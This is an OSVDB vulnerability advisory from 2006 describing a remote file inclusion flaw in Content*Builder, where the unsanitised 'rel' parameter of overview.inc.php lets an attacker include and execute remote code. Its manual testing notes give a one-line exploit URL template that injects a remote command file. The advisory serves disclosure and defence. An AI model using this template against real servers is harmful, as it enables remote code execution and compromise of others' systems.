Content*Builder download/overview.inc.php rel Variable Remote File Inclusion

2006-06-11T16:34:06
ID OSVDB:26355
Type osvdb
Reporter Federico Fazzi(federico@autistici.org)
Modified 2006-06-11T16:34:06

Description

Vulnerability Description

Content*Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /modules/download/overview.inc.php script not properly sanitizing user input supplied to the 'rel' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Content*Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /modules/download/overview.inc.php script not properly sanitizing user input supplied to the 'rel' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/

References:

Vendor URL: http://www.content-builder.de/ Secunia Advisory ID:20557 Related OSVDB ID: 26344 Related OSVDB ID: 26346 Related OSVDB ID: 26347 Related OSVDB ID: 26348 Related OSVDB ID: 26349 Related OSVDB ID: 26362 Related OSVDB ID: 26359 Related OSVDB ID: 26345 Related OSVDB ID: 26350 Related OSVDB ID: 26351 Related OSVDB ID: 26352 Related OSVDB ID: 26353 Related OSVDB ID: 26357 Related OSVDB ID: 26358 Related OSVDB ID: 26360 Related OSVDB ID: 26361 Related OSVDB ID: 26363 Related OSVDB ID: 26354 Related OSVDB ID: 26356 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0211.html FrSIRT Advisory: ADV-2006-2300 CVE-2006-3172 Bugtraq ID: 18404